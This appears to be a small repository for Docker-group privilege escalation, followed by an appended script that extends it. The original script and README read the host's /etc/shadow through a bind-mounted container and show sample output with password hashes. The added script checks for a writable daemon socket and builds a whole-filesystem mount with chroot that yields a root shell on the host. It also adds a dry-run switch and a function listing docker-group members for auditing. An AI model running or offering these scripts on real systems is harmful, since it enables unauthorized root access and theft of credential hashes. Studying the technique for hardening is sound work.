├── Dockerfile
├── docker-escalate.sh
└── README.md

/Dockerfile:
--------------------------------------------------------------------------------
FROM alpine

# Mount point that docker-escalate.sh binds the host's /etc onto.
VOLUME /root
--------------------------------------------------------------------------------

/docker-escalate.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Nothing to do if we already are uid 0.
if [ "$(id -u)" -eq 0 ]; then
    echo "Already root"
    exit 0
fi

# Membership in the docker group is all that is needed: the daemon runs as
# root and bind-mounts any host path into a container on request.
# -w matches the whole word so that a group such as "dockerroot" is not
# mistaken for "docker".
if groups "$USER" | grep -qw docker; then
    echo "User $USER in docker group, attacking..."
    # Mount the host's /etc at /root inside a minimal image and read the
    # shadow file as the container's root user.
    docker run -v /etc:/root krustyhack/docker-privesc cat /root/shadow
else
    echo "User $USER not in docker group, abort."
fi
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# docker-privilege-escalation
A docker example for privilege escalation

## How?

Membership in the `docker` group grants access to the Docker daemon's socket, and the daemon itself runs as root. A user in that group can therefore start a container with any host path bind-mounted into it (`-v /host/path:/container/path`). Commands inside the container run as uid 0, so they read and write the mounted host files with root privileges, whatever the user's privileges on the host are. In this case, the user runs a light container with the host's /etc mounted in and reads a file that only root can read.

The following example shows how to read /etc/shadow from the host with the help of a docker container and a user in the docker group.

This is not a bug in Docker but its documented trust model; as the Docker security documentation puts it: ```only trusted users should be allowed to control your Docker daemon```.

## Usage

* ``` chmod +x docker-escalate.sh```
* ``` ./docker-escalate.sh```


### Success
```
user@test:$ ./docker-escalate.sh
User user in docker group, attacking...
root:$6$QHOCMH......................kh4A1Dx6sASl/BM0L/:16514:0:99999:7:::
daemon:*:16514:0:99999:7:::
bin:*:16514:0:99999:7:::
sys:*:16514:0:99999:7:::
sync:*:16514:0:99999:7:::
games:*:16514:0:99999:7:::
man:*:16514:0:99999:7:::
lp:*:16514:0:99999:7:::
mail:*:16514:0:99999:7:::
news:*:16514:0:99999:7:::
uucp:*:16514:0:99999:7:::
proxy:*:16514:0:99999:7:::
www-data:*:16514:0:99999:7:::
backup:*:16514:0:99999:7:::
list:*:16514:0:99999:7:::
irc:*:16514:0:99999:7:::
gnats:*:16514:0:99999:7:::
nobody:*:16514:0:99999:7:::
libuuid:!:16514:0:99999:7:::
syslog:*:16514:0:99999:7:::
user:$6$QHOCMHim$f9FEVV7/.TnxLsT5Wt14DTE5Qo8iCwPFjGAyYUH4vZQUawOKrlcXffrl2.ZLmA.fubLXkh4A1Dx6sASl/BM0L/:16540:0:99999:7:::
```

### Fail

```
user@user:$ ./docker-escalate.sh
User test not in docker group, abort.
```
--------------------------------------------------------------------------------
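The script below is an added example and is not part of this repository. It generalises docker-escalate.sh in three ways a practitioner usually wants: it tests the running session's groups with `id -nG` instead of the database via `groups $USER`, it also checks whether the daemon socket is writable without group membership, and besides the page's "read one file" mode it builds the whole-filesystem mount plus `chroot` variant that gives a root shell on the host rather than only inside the container. It also includes the defender's counterpart, listing the docker group's members from /etc/group content. Function names, the `alpine:3` image, the `/host` mount point and the `RUN=1` switch are choices made here, not taken from the page.

```bash
#!/bin/bash
# Added example, not part of the docker-privilege-escalation repository.
# Assumptions made here (not from the page): function names, the alpine:3
# image, the /host mount point and the RUN=1 switch that enables execution.
set -u

# Return 0 if "docker" appears as a whole word in a space-separated group
# list such as the output of `id -nG`. A plain `grep docker` would also
# accept unrelated groups like "dockerroot".
in_docker_group() {
    local groups_list="$1" g
    for g in $groups_list; do
        [ "$g" = "docker" ] && return 0
    done
    return 1
}

# Return 0 if the daemon socket at the given path is writable by this
# process. The socket is normally root:docker mode 660, but a misconfigured
# host may expose it more widely even to users outside the group.
docker_socket_writable() {
    [ -w "$1" ]
}

# Defender's view: print the members of the docker group from /etc/group
# content given on stdin, one per line. Everyone listed can root the host.
docker_group_members() {
    awk -F: '$1 == "docker" { n = split($4, m, ","); for (i = 1; i <= n; i++) if (m[i] != "") print m[i] }'
}

# Build the docker command for a given mode.
#   read  - the page's technique: bind-mount a host directory and cat a
#           file out of it as the container's root user.
#   shell - bind-mount the whole host filesystem and chroot into it, which
#           yields an interactive root shell on the host itself.
build_escalation_cmd() {
    local mode="$1" host_path="${2:-/}" file="${3:-}"
    case "$mode" in
        read)  printf 'docker run --rm -v %s:/host alpine:3 cat /host/%s\n' "$host_path" "$file" ;;
        shell) printf 'docker run --rm -it -v /:/host alpine:3 chroot /host /bin/sh\n' ;;
        *)     return 2 ;;
    esac
}

# Same decision tree as docker-escalate.sh, but based on the session's own
# groups and the socket, and only executing docker when RUN=1 is set.
main() {
    local mode="${1:-read}" cmd
    if [ "$(id -u)" -eq 0 ]; then
        echo "Already root"
        return 0
    fi
    # `id -nG` reports the groups of the running process. `groups $USER`
    # reads /etc/group, which also lists a membership added after login
    # that is not yet effective in this shell, so docker would still fail.
    if in_docker_group "$(id -nG)"; then
        echo "Session is in the docker group, attacking..."
    elif docker_socket_writable /var/run/docker.sock; then
        echo "Docker socket is writable without group membership, attacking..."
    else
        echo "No access to the Docker daemon, abort."
        return 1
    fi
    cmd=$(build_escalation_cmd "$mode" /etc shadow) || return 2
    if [ "${RUN:-0}" = 1 ]; then
        eval "$cmd"
    else
        echo "Would run: $cmd"
    fi
}

# Only act when invoked as `./script.sh run [read|shell]`; running it
# without arguments just defines the functions above.
case "${1:-}" in
    run) main "${2:-read}" ;;
esac
```

Without `RUN=1` the script only prints the command it would execute, which is the safer default when the goal is to confirm the exposure during an assessment. On the defensive side, `getent group docker | docker_group_members`-style audits and keeping untrusted users out of the group are the remedies the Docker documentation points to; the escalation does not depend on any bug in the daemon, only on who may talk to it.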